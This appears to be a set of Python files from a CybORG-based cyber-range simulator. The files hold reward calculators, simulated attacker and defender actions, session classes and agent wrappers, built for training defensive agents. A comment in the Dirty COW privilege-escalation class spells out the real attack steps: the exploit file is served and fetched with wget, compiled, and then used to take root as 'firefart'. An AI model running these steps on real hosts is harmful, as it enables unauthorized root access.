        self.disrupt_rc = DistruptRewardCalculator(self.adversary, scenario)
        self.impacted_hosts = {}

    def reset(self):
        self.disrupt_rc.reset()

    def calculate_reward(self, current_state: dict, action: dict, agent_observations: dict, done: bool) -> float:
        self.impacted_hosts = {}
        reward = -self.disrupt_rc.calculate_reward(current_state, action, agent_observations, done)
        self._calculate_impacted_hosts()
        return reward

    def _calculate_impacted_hosts(self):
        for host, value in self.disrupt_rc.impacted_hosts.items():
            self.impacted_hosts[host] = -1 * value


class HybridAvailabilityConfidentialityRewardCalculator(RewardCalculator):
    # Hybrid of availability and confidentiality reward calculator
    def __init__(self, agent_name: str, scenario: Scenario):
        super(HybridAvailabilityConfidentialityRewardCalculator, self).__init__(agent_name)
        self.availability_calculator = AvailabilityRewardCalculator(agent_name, scenario)
        self.confidentiality_calculator = ConfidentialityRewardCalculator(agent_name, scenario)

    def reset(self):
        self.availability_calculator.reset()
        self.confidentiality_calculator.reset()

    def calculate_reward(self, current_state: dict, action: dict, agent_observations: dict, done: bool) -> float:
        reward = self.availability_calculator.calculate_reward(current_state, action, agent_observations, done) \
                 + self.confidentiality_calculator.calculate_reward(current_state, action, agent_observations, done)
        self._compute_host_scores(current_state.keys())
        return reward

    def _compute_host_scores(self, hostnames):
        self.host_scores = {}
        compromised_hosts = self.confidentiality_calculator.compromised_hosts
        impacted_hosts = self.availability_calculator.impacted_hosts
        for host in hostnames:
            if host == 'success':
                continue
            compromised = compromised_hosts[host] if host in compromised_hosts else 0
            impacted = impacted_hosts[host] if host in impacted_hosts else 0
            reward_state = HostReward(compromised, impacted)
            # confidentiality, availability
            self.host_scores[host] = reward_state



# Copyright DST Group. Licensed under the MIT license.
from ipaddress import IPv4Address

from csle_cyborg.shared.actions.shell_actions_folder.shell_privilege_escalation_folder.shell_privilege_escalation import ShellPrivilegeEscalation


# May want to separate this action into two actions which takes a session each in future, rather than one action that
# takes two sessions
#
# Steps to perform exploit are as follows:
# On Attacker, with current dir as root:
# cp /usr/share/exploitdb/exploits/linux/local/40839.c ~
# python -m SimpleHTTPServer 8080
# On PublicFacing or other target box:
# cd /tmp
# wget http://<Attacker IP>:8080/40839.c
# gcc -pthread -lcrypt 40839.c -o 40839
# ./40839
# Prompted to create a password at this point, enter "password", then there will be a delay
# su firefart
# Now prompted for password, enter "password"
# gives a root privileged session as user firefart (which has replaced root user in /etc/passwd file)
from csle_cyborg.shared.enums import FileType
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.state import State


class DirtyCowPrivilegeEscalation(ShellPrivilegeEscalation):
    def __init__(self, session: int, agent: str, target_session: int):
        super().__init__(session, agent, target_session)

    def sim_execute(self, state: State):
        self.obs = Observation()
        self.obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return self.obs
        # get hosts
        attacker_session = state.sessions[self.agent][self.session]
        user = attacker_session.user
        attacker_host = attacker_session.host

        if not attacker_session.active:
            self.obs.set_success(False)
            return self.obs

        # get file from attacker to target
        dirty_cow_c_file = None
        readable = False
        for file in attacker_host.files:
            if file.file_type == FileType.DirtyCowCode:
                dirty_cow_c_file = file
                readable = file.check_readable(user)
                break

        if dirty_cow_c_file is None:
            self.obs.set_success(False)
            return self.obs
        if not readable:
            self.obs.set_success(False)
            return self.obs

        self.obs.add_file_info(hostid="hostid0", path=dirty_cow_c_file.path, file_type=dirty_cow_c_file.file_type, name=dirty_cow_c_file.name)

        self.run_web_server(attacker_session)

        self.copy_files_to_webserver(attacker_session, dirty_cow_c_file)

        if self.target_session not in state.sessions[self.agent]:
            return self.obs

        target_session = state.sessions[self.agent][self.target_session]
        if not target_session.active:
            self.obs.set_success(False)
            return self.obs

        attacker_ip = None
        if attacker_session.host == target_session.host:
            attacker_ip = IPv4Address("127.0.0.1")
            target_ip = IPv4Address("127.0.0.1")
        else:
            for interface in attacker_session.host.interfaces:
                if interface.name != "lo":
                    for interface2 in target_session.host.interfaces:
                        if interface.ip_address in interface2.subnet.cidr.hosts():
                            attacker_ip = interface.ip_address
                            target_ip = interface2.ip_address
                            break

        if attacker_ip is None:
            self.obs.set_success(False)
            return self.obs

        file = self.download_file(target_session, dirty_cow_c_file, attacker_ip, target_ip)

        if file is None:
            self.obs.set_success(False)
            return self.obs

        # compile file on target
        executable_file = self.compile_file(target_session, file)

        if executable_file is None:
            self.obs.set_success(False)
            return self.obs

        executed = self.execute_file(target_session, executable_file)
        if not executed:
            self.obs.set_success(False)
            return self.obs

        # switch user to firefart
        self.switch_user(target_session, "firefart", "password")
        self.obs.set_success(True)
        return self.obs

    def execute_file(self, session, file):
        if file.check_executable(session.user):
            for user in session.host.users:
                if user.uid == 0:
                    user.username = "firefart"
                    user.password = "password"
                    user.password_hash = "ro46DZg1ViGBs"
                    self.obs.add_user_info(hostid="hostid1", group_name="root", gid=0, username="firefart", uid=0, password="password", password_hash="ro46DZg1ViGBs")
                    return True
        return False



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.shell_actions_folder.account_manipulation_folder.account_manipulation import AccountManipulation
from csle_cyborg.shared.enums import OperatingSystemType
from csle_cyborg.shared.observation import Observation


class AddUserWindows(AccountManipulation):
    def __init__(self, session, agent, username, password):
        super().__init__(session, agent)
        self.username = username
        self.password = password

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs

        if state.sessions[self.agent][self.session].active:
            host = state.sessions[self.agent][self.session].host
            obs.add_system_info(hostid="hostid0", os_type=host.os_type)
            if host.os_type == OperatingSystemType.WINDOWS:
                user = host.add_user(username=self.username, password=self.password)
                if user is not None:
                    obs.set_success(True)

                else:
                    obs.set_success(False)

            else:
                obs.set_success(False)
        else:
            obs.set_success(False)
        return obs



# Copyright DST Group. Licensed under the MIT license.
import time
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.enums import QueryType
from .velociraptor_action import VelociraptorAction


class VelociraptorSleep(VelociraptorAction):

    def __init__(self, session: int, agent: str, t: int = 1):
        super().__init__(session=session,
                         agent=agent,
                         query_type=QueryType.SYNC,
                         poll_alerts=False)
        self.t = t

    def emu_execute(self,
                    session_handler,
                    *args,
                    **kwargs):
        time.sleep(self.t)
        obs = Observation()
        obs.set_success(True)
        obs.add_raw_obs(f"I slept {self.t} secs")
        return obs



## The following code contains work of the United States Government and is not subject to domestic copyright protection under 17 USC § 105.
## Additionally, we waive copyright and related rights in the utilized code worldwide through the CC0 1.0 Universal public domain dedication.
from ipaddress import IPv4Address
from csle_cyborg.shared.enums import SessionType, OperatingSystemType
from csle_cyborg.simulator.entity import Entity


class Session(Entity):

    def __init__(self, ident: int, host: str, username: str, agent: str,
                 pid: int, timeout: int = 0, session_type: str = 'shell',
                 active: bool = True, parent=None, name=None,
                 is_escalate_sandbox: bool = False):
        super().__init__()
        self.ident = ident
        self.host = host
        self.username = username
        self.agent = agent
        self.timeout = timeout
        self.pid = pid
        self.parent = parent
        self.session_type = SessionType.parse_string(session_type) if type(session_type) is str else session_type
        self.active = active
        self.children = {}
        self.name = name
        self.is_escalate_sandbox = is_escalate_sandbox

    def get_state(self):
        return {"username": self.username, "session_id": self.ident, "timeout": self.timeout,
                "pid": self.pid, "session_type": self.session_type, "agent": self.agent}

    def set_orphan(self):
        self.active = False
        self.parent = None

    def dead_child(self, child_id: int):
        self.children.pop(child_id)


class RedAbstractSession(Session):
    # a session that remembers previously seen information that can be used by actions
    def __init__(self, ident: int, host: str, username: str, agent: str,
                 pid: int, timeout: int = 0, session_type: str = 'shell', active: bool = True, parent=None, name=None):
        super().__init__(ident, host, username, agent, pid, timeout, session_type, active, parent, name)
        self.ports = {}  # a mapping of IP Addresses to previously seen open ports
        self.operating_system = {}  # a mapping of hostnames to os types
        self.ot_service = None

    def addport(self, ip_address: IPv4Address, port: int):
        if ip_address in self.ports:
            self.ports[ip_address].append(port)
        else:
            self.ports[ip_address] = [port]

    def clearports(self, ip_address: IPv4Address):
        self.ports[ip_address] = []

    def addos(self, hostname: str, os: OperatingSystemType):
        self.operating_system[hostname] = os


class GreenAbstractSession(Session):
    # Currently a clone of RedAbstractSession
    # a session that remembers previously seen information that can be used by actions
    def __init__(self, ident: int, host: str, username: str, agent: str,
                 pid: int, timeout: int = 0, session_type: str = 'shell', active: bool = True, parent=None, name=None):
        super().__init__(ident, host, username, agent, pid, timeout, session_type, active, parent, name)
        self.ports = {}  # a mapping of IP Addresses to previously seen open ports
        self.operating_system = {}  # a mapping of hostnames to os types
        self.ot_service = None

    def addport(self, ip_address: IPv4Address, port: int):
        if ip_address in self.ports:
            self.ports[ip_address].append(port)
        else:
            self.ports[ip_address] = [port]

    def addos(self, hostname: str, os: OperatingSystemType):
        self.operating_system[hostname] = os


class VelociraptorServer(Session):
    # a session that remembers previously seen information that can be used by actions
    def __init__(self, ident: int, host: str, username: str, agent: str,
                 pid: int, timeout: int = 0, session_type: str = 'shell', active: bool = True, parent=None, name=None,
                 artifacts=None):
        super().__init__(ident, host, username, agent, pid, timeout, session_type, active, parent, name)
        self.artifacts = [] if artifacts is None else artifacts  # a list of artifacts that the velociraptor collects
        self.sus_pids = {}
        self.sus_files = {}

    def add_sus_pids(self, hostname: str, pid: int):
        if hostname in self.sus_pids:
            self.sus_pids[hostname].append(pid)
        else:
            self.sus_pids[hostname] = [pid]



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.game_actions.game_action import GameAction


class ResetGame(GameAction):
    """Resets the game. """

    def emu_execute(self, game_controller, *args, **kwargs) -> Observation:
        # this is a special action in that it's emu_execute function is not
        # called. Instead the emulatorservercontroller will handle the reset
        # logic when it recieves this action.
        # This is done since resetting is a bit different to a normal action
        # and has to handle returning the observation and action space for
        # multiple agents
        assert False



# Copyright DST Group. Licensed under the MIT license.
import copy

from csle_cyborg.shared.actions.shell_actions_folder.shell_action import ShellAction
from csle_cyborg.shared.enums import FileType, SessionType, FileVersion, OperatingSystemType
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.file import File
from csle_cyborg.simulator.session import Session
from csle_cyborg.simulator.state import State


class ShellPrivilegeEscalation(ShellAction):
    def __init__(self, attacker_session: int, agent, target_session: int):
        super().__init__(attacker_session, agent)
        self.target_session = target_session
        self.obs = Observation()

    def sim_execute(self, state: State):
        pass

    def run_web_server(self, session: Session):
        for file in session.host.files:
            if file.file_type == FileType.PYTHON:
                session.host.add_process(name="python", ppid=session.process.pid, user=session.user, open_ports={"Port": 8080, "Application Protocol": "HTTP", "Address": "broadcast"}, process_type="webserver", version="python SimpleHTTPServer")
                self.obs.add_process(hostid="hostid0", local_address="0.0.0.0", local_port=8080, status="open", process_type="webserver", process_version="python SimpleHTTPServer")
                break

    def copy_files_to_webserver(self, session, file):
        if file.check_readable(session.user) and session.host.os_type == OperatingSystemType.LINUX:
            new_file = copy.deepcopy(file)
            new_file.path = "/tmp/webserver/"
            session.host.files.append(new_file)
            self.obs.add_file_info(hostid="hostid0", name=file.name, path=file.path, file_type=file.file_type)
            self.obs.add_file_info(hostid="hostid0", name=new_file.name, path=new_file.path, file_type=new_file.file_type)
            self.obs.add_system_info(hostid="hostid0", os_type=OperatingSystemType.LINUX)
            return new_file

    def download_file(self, session, file, ip_address, from_ip_address):
        if session.session_type == SessionType.SHELL:
            self.obs.add_interface_info(hostid="hostid1", ip_address=from_ip_address)
            new_file = copy.deepcopy(file)
            new_file.path = "/tmp/"
            new_file.user = session.user
            new_file.group = session.user.groups[0].name
            session.host.files.append(new_file)
            self.obs.add_file_info(hostid="hostid1", name=new_file.name, path=new_file.path, file_type=new_file.file_type)
            return new_file

    def compile_file(self, session, code_file: File):
        # find gcc to compile files
        for file in session.host.files:
            if file.file_type == FileType.GCC:
                if file.check_executable(session.user):
                    if code_file.check_readable(session.user):
                        if code_file.file_type == FileType.DirtyCowCode and file.version == FileVersion.U4_2_4_1 and session.host.os_type == OperatingSystemType.LINUX:
                            exe_file = copy.deepcopy(code_file)
                            exe_file.file_type = FileType.DirtyCowExe
                            exe_file.name = "40839"
                            session.host.files.append(exe_file)
                            self.obs.add_file_info(hostid="hostid1", name=exe_file.name, path=exe_file.path,
                                                   file_type=exe_file.file_type)
                            self.obs.add_system_info(hostid="hostid1", os_type=OperatingSystemType.LINUX)
                            return exe_file
                        elif code_file.file_type == FileType.UDEV141CODE and session.host.os_type == OperatingSystemType.LINUX and file.version == FileVersion.U4_2_4_1:
                            exe_file = copy.deepcopy(code_file)
                            exe_file.file_type = FileType.UDEV141EXE
                            exe_file.name = "8572"
                            session.host.files.append(exe_file)
                            self.obs.add_file_info(hostid="hostid1", name=exe_file.name, path=exe_file.path,
                                                   file_type=exe_file.file_type)
                            self.obs.add_system_info(hostid="hostid1", os_type=OperatingSystemType.LINUX)
                            return exe_file

    def switch_user(self, session, username, password):
        for user in session.host.users:
            if user.username == username:
                if user.password == password:
                    session.user = user
                    self.obs.add_session_info(hostid="hostid1", session_id=session.ident, timeout=0, username=username, session_type=session.session_type, agent=self.agent)
                    break



from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.concrete_actions.concrete_action import ConcreteAction


class GreenPortScan(ConcreteAction):
    def __init__(self, session: int, agent: str, hostname: str):
        super().__init__(agent=agent, session=session)
        self.hostname = hostname

    def sim_execute(self, state) -> Observation:
        obs = Observation()
        obs.set_success(True)
        # find session inside or close to the target subnet
        session = self.session
        # Get the ip of the hostname
        ip_map = state.ip_addresses
        for ip in ip_map:
            if ip_map[ip] == self.hostname:
                self.ip_address = ip
                break

        from_host = state.sessions['Red'][self.session].host
        target_host: Host = state.hosts[state.ip_addresses[self.ip_address]]
        ports = ['all']
        for ip in ip_map:
            if ip_map[ip] == from_host:
                originating_ip_address = ip

        for process in target_host.processes:
            for conn in process.connections:
                if 'local_port' in conn and (
                        conn['local_port'] in ports or 'all' in ports) and 'remote_port' not in conn:
                    obs.add_process(hostid=str(self.ip_address), local_port=conn["local_port"],
                                    local_address=self.ip_address)
                    target_host.events['NetworkConnections'].append({'local_address': self.ip_address,
                                                                     'local_port': conn["local_port"],
                                                                     'remote_address': originating_ip_address,
                                                                     'remote_port': target_host.get_ephemeral_port()})

        return obs



# Copyright DST Group. Licensed under the MIT license.
from ipaddress import IPv4Network

from csle_cyborg.shared.actions.msf_actions_folder.msf_action import MSFAction
from csle_cyborg.simulator.session import SessionType
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.state import State


class MSFAutoroute(MSFAction):
    def __init__(self, target_session, agent, session):
        super().__init__(session, agent)
        self.meterpreter_session = target_session

    def sim_execute(self, state: State):
        obs = Observation()
        if self.session not in state.sessions[self.agent] or self.meterpreter_session not in state.sessions[self.agent]:
            obs.set_success(False)
            return obs
        interfaces = []
        meterpreter_session = state.sessions[self.agent][self.meterpreter_session]
        msf_session = state.sessions[self.agent][self.session]
        if meterpreter_session in msf_session.children.values() and meterpreter_session.session_type == SessionType.METERPRETER and msf_session.session_type == SessionType.MSF_SERVER:
            obs.set_success(True)
            for interface in state.hosts[meterpreter_session.host].interfaces:
                if str(interface.ip_address) != '127.0.0.1':
                    interfaces.append(interface)
                    obs.add_interface_info(hostid=str(self.meterpreter_session), subnet=interface.subnet)
            msf_session.routes[self.meterpreter_session] = interfaces
        else:
            obs.set_success(False)
        return obs

    def emu_execute(self, session_handler) -> Observation:
        obs = Observation()
        from csle_cyborg.CybORG import MSFSessionHandler
        if type(session_handler) is not MSFSessionHandler:
            obs.set_success(False)
            return obs
        output = session_handler.execute_module(mtype='post', mname='multi/manage/autoroute',
                                         opts={'SESSION': self.meterpreter_session})
        obs.add_raw_obs(output)
        """Example:
        [!] SESSION may not be compatible with this module.
        [*] Running module against 10.0.2.164
        [*] Searching for subnets to autoroute.
        [+] Route added to subnet 10.0.2.0/255.255.254.0 from host's routing table.
        [*] Post module execution completed
        """
        obs.set_success(False)
        for line in output.split('\n'):
            if '[+] Route added' in line:
                obs.set_success(True)
                subnet = line.split(' ')[5]
                obs.add_interface_info(hostid=str(self.meterpreter_session), subnet=IPv4Network(subnet))

        return obs

    def __str__(self):
        return super(MSFAutoroute, self).__str__() + f", Meterpreter Session: {self.meterpreter_session}"



import random

from csle_cyborg.agents.simple_agents.base_agent import BaseAgent
from csle_cyborg.shared.actions.action import Sleep
from csle_cyborg.shared.actions.green_actions.green_ping_sweep import GreenPingSweep
from csle_cyborg.shared.actions.green_actions.green_port_scan import GreenPortScan


class GreenAgent(BaseAgent):
    def __init__(self):
        self.action_space = [
            Sleep,
            # GreenPingSweep,
            GreenPortScan,
            # GreenConnection,
        ]
        self.hostnames = [
            'User0',
            'User1',
            'User2',
            'User3',
            'User4',
            'Enterprise0',
            'Enterprise1',
            'Enterprise2',
        ]
        self.subnets = [
            'User',
            'Enterprise',
            'Operational_A',
        ]

    def get_action(self, observation, action_space):
        action = random.choice(self.action_space)
        if action == Sleep:
            return Sleep()
        elif action == GreenPingSweep:
            subnet = random.choice(self.subnets)
            return action(subnet=subnet, session=0, agent='Green')
        else:
            hostname = random.choice(self.hostnames)
            return action(hostname=hostname, session=0, agent='Green')

    def train(self, results):
        pass

    def end_episode(self):
        pass

    def set_initial_values(self, action_space, observation):
        pass



from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.concrete_actions.concrete_action import ConcreteAction
from csle_cyborg.simulator.host import Host
from csle_cyborg.simulator.state import State


class RestoreFromBackup(ConcreteAction):
    def __init__(self, session: int, agent: str, target_session: int):
        super(RestoreFromBackup, self).__init__(session, agent)
        self.target_session = target_session

    def sim_execute(self, state: State) -> Observation:
        obs = Observation()
        if self.session not in state.sessions[self.agent] or self.target_session not in state.sessions[self.agent]:
            obs.set_success(False)
            return obs
        target_host: Host = state.hosts[state.sessions[self.agent][self.target_session].host]
        session = state.sessions[self.agent][self.session]
        target_session = state.sessions[self.agent][self.target_session]

        if not session.active or not target_session.active:
            obs.set_success(False)
            return obs

        old_sessions = {}
        for agent, sessions in target_host.sessions.items():
            old_sessions[agent] = {}
            for session in sessions:
                old_sessions[agent][session] = state.sessions[agent].pop(session)
        target_host.restore()
        for agent, sessions in target_host.sessions.items():
            for session in sessions:
                state.sessions[agent][session] = old_sessions[agent][session]
        return obs



import inspect

from csle_cyborg.agents.wrappers.base_wrapper import BaseWrapper
from csle_cyborg.shared.results import Results


# this wrapper converts a list into an action object based on the action space
from csle_cyborg.shared.actions.action import Sleep


class IntListToActionWrapper(BaseWrapper):
    def __init__(self, env=None, agent=None):
        super().__init__(env, agent)
        self.action_space = None
        self.action_params = None
        self.param_name = None
        self.selection_mask = None

    def step(self, agent=None, action: list = None) -> Results:
        if action is not None:
            try:
                action_obj = self.get_action(agent, action)
            except:
                print('Error')
        else:
            action_obj = None
        result = self.env.step(agent, action_obj)
        result.action_space, result.selection_masks = self.action_space_change(result.action_space)
        self.selection_mask = result.selection_masks
        result.action_name = str(action_obj)
        return result

    def reset(self, agent=None):
        result = self.env.reset(agent)
        result.action_space, result.selection_masks = self.action_space_change(result.action_space)
        self.selection_mask = result.selection_masks
        result.observation = self.observation_change(result.observation)
        return result

    def get_action_space(self, agent: str) -> dict:
        action_space, selection_mask = self.action_space_change(self.env.get_action_space(agent))
        self.selection_mask = selection_mask
        return action_space

    def action_space_change(self, action_space: dict) -> (list, list):
        self.action_space = action_space
        selection_masks = []
        new_action_space = []
        self.param_name = []
        for key, value in action_space.items():
            if len(value) > 1:
                new_action_space.append(len(value))
                selection_masks.append([list(value.keys()).index(i) for i, v in value.items() if v])
                self.param_name.append(key)
        return new_action_space, selection_masks

    def get_action(self, agent: str, action: list):
        """converts a list to an action object"""
        opts = {}
        if self.action_space is None:
            self.get_action_space(agent)
        action_class = list(self.action_space['action'])[action[0]]
        if self.action_params is None:
            self.action_params = {}
            for ac in self.action_space['action'].keys():
                self.action_params[ac] = inspect.signature(ac).parameters
        count = 0
        for key, value in self.action_space.items():
            if key in self.action_params[action_class]:
                if len(value) > 1:
                    if action[count] < len(value):
                        if list(value.values())[action[count]]:
                            opts[key] = list(value.keys())[action[count]]
                else:
                    if list(value.values())[0]:
                        opts[key] = list(value.keys())[0]
            if len(value) > 1:
                count += 1
        try:
            action_obj = action_class(**opts)
        except TypeError:
            action_obj = Sleep()
        return action_obj

    def get_attr(self,attribute:str):
        return self.env.get_attr(attribute)



# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.enums import QueryType
from csle_cyborg.shared.observation import Observation
from .velociraptor_action import VelociraptorAction


class GetHostList(VelociraptorAction):
    """Get a list of all hosts being monitored"""

    def __init__(self, session: int, agent: str):
        super().__init__(session=session,
                         agent=agent,
                         query_type=QueryType.SYNC)
        self.parameters['tag'] = 'internal_query'
        self.parameters['artifactname'] = 'GetHostList'
        self.query = "SELECT client_id, os_info.fqdn FROM clients()"

    def sim_execute(self, state):
        raise NotImplementedError

    def parse(self, results: list, client_id: str) -> Observation:
        """Parses the results of the execute action to create an observation"""
        obs = Observation()
        if results == []:
            obs.set_success(False)
            return obs
        else:
            obs.add_raw_obs(results)
            obs.set_success(True)
        for host in results:
            obs.add_system_info(
                hostid=host["client_id"],
                hostname=host['os_info.fqdn']
            )
        return obs



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.msf_actions_folder.msf_action import MSFAction


class MSFPrivilegeEscalation(MSFAction):
    def __init__(self):
        super().__init__()

    def sim_execute(self, state):
        pass



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.msf_actions_folder.meterpreter_actions_folder.meterpreter_action import MeterpreterAction
from csle_cyborg.shared.enums import OperatingSystemType, SessionType
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.state import State


# Call getpid from a meterpreter session - gives the process id of the session
class GetPid(MeterpreterAction):
    def __init__(self, session: int, agent: str):
        super().__init__(session=session, agent=agent)

    def sim_execute(self, state: State):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs
        session = state.sessions[self.agent][self.session]

        if session.session_type != SessionType.METERPRETER or not session.active:
            return obs

        if session.host.os_type == OperatingSystemType.LINUX:
            for group in session.user.groups:
                # Is this the best way to check this? Can group name be changed, is there some other way to check if it
                # is a user with minimal privileges?
                if group.name == "nogroup":
                    return obs

        obs.set_success(True)
        obs.add_session_info(session_id=self.session, agent=self.agent, pid=session.process.pid,
                             session_type="meterpreter")
        return obs



from csle_cyborg.main import Main
import inspect
from csle_cyborg.agents.simple_agents.keyboard_agent import KeyboardAgent
from csle_cyborg.agents.simple_agents.green_agent import GreenAgent
from csle_cyborg.agents.simple_agents.b_line import B_lineAgent
from csle_cyborg.agents.wrappers.blue_table_wrapper import BlueTableWrapper


if __name__ == "__main__":
    print("Setup")
    path = str(inspect.getfile(Main))
    path = path[:-7] + '/Shared/Scenarios/Scenario1b.yaml'

    agents = {'Red': B_lineAgent,'Green': GreenAgent}
    # agents = {'Red': RedMeanderAgent,'Green': GreenAgent}
    cyborg = BlueTableWrapper(Main(path, 'sim',agents=agents), output_mode='table')
    
    agent_name = 'Blue'

    results = cyborg.reset(agent=agent_name)
    observation = results.observation
    action_space = results.action_space

    agent = KeyboardAgent()

    reward = 0
    done = False
    while True:
        action = agent.get_action(observation, action_space)
        results = cyborg.step(agent=agent_name, action=action)
        print(cyborg.get_last_action(agent='Red'))
        print('>>> Reward: ', results.reward)

        reward += results.reward
        observation = results.observation
        action_space = results.action_space
        if done:
            print(f"Game Over. Total reward: {reward}")
            break



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.msf_actions_folder.meterpreter_actions_folder.meterpreter_action import MeterpreterAction
from csle_cyborg.shared.enums import OperatingSystemType, SessionType
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.state import State


# Call sysinfo from a meterpreter session - gives internal system information
class SysInfo(MeterpreterAction):
    def __init__(self, session: int, agent: str):
        super().__init__(session=session, agent=agent)

    def sim_execute(self, state: State):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs
        session = state.sessions[self.agent][self.session]

        if session.session_type != SessionType.METERPRETER or not session.active:
            return obs

        obs.set_success(True)

        if session.host.os_type == OperatingSystemType.LINUX:
            for group in session.user.groups:
                # Is this the best way to check this? Can group name be changed, is there some other way to check if it
                # is a user with minimal privileges?
                if group.name == "nogroup":
                    obs.add_system_info(hostname=session.host.hostname, os_type=OperatingSystemType.LINUX,
                                        os_kernel=session.host.kernel, architecture=session.host.architecture)
                    return obs
            obs.add_system_info(hostname=session.host.hostname, os_type=OperatingSystemType.LINUX,
                                os_distribution=session.host.distribution, os_version=session.host.version,
                                os_kernel=session.host.kernel, architecture=session.host.architecture)
            return obs
        else:
            obs.add_system_info(hostname=session.host.hostname, os_type=session.host.os_type,
                                os_distribution=session.host.distribution, os_version=session.host.version,
                                architecture=session.host.architecture)
            return obs



import inspect
from typing import Union
from csle_cyborg.agents.simple_agents.base_agent import BaseAgent
from csle_cyborg.agents.wrappers.base_wrapper import BaseWrapper
from csle_cyborg.shared.results import Results


class EnumActionWrapper(BaseWrapper):
    def __init__(self, env: Union[type, BaseWrapper] = None, agent: BaseAgent = None):
        super().__init__(env, agent)
        self.possible_actions = None
        self.action_signature = {}
        self.get_action_space('Red')

    def step(self, agent=None, action: int = None) -> Results:
        if action is not None:
            action = self.possible_actions[action]
        return super().step(agent, action)

    def action_space_change(self, action_space: dict) -> int:
        assert type(action_space) is dict, \
            f"Wrapper required a dictionary action space. " \
            f"Please check that the wrappers below the ReduceActionSpaceWrapper return the action space as a dict "
        possible_actions = []
        temp = {}
        params = ['action']
        # for action in action_space['action']:
        for i, action in enumerate(action_space['action']):
            if action not in self.action_signature:
                self.action_signature[action] = inspect.signature(action).parameters
            param_dict = {}
            param_list = [{}]
            for p in self.action_signature[action]:
                if p == 'priority':
                    continue
                temp[p] = []
                if p not in params:
                    params.append(p)

                if len(action_space[p]) == 1:
                    for p_dict in param_list:
                        p_dict[p] = list(action_space[p].keys())[0]
                else:
                    new_param_list = []
                    for p_dict in param_list:
                        for key, val in action_space[p].items():
                            p_dict[p] = key
                            new_param_list.append({key: value for key, value in p_dict.items()})
                    param_list = new_param_list
            for p_dict in param_list:
                possible_actions.append(action(**p_dict))

        self.possible_actions = possible_actions
        return len(possible_actions)
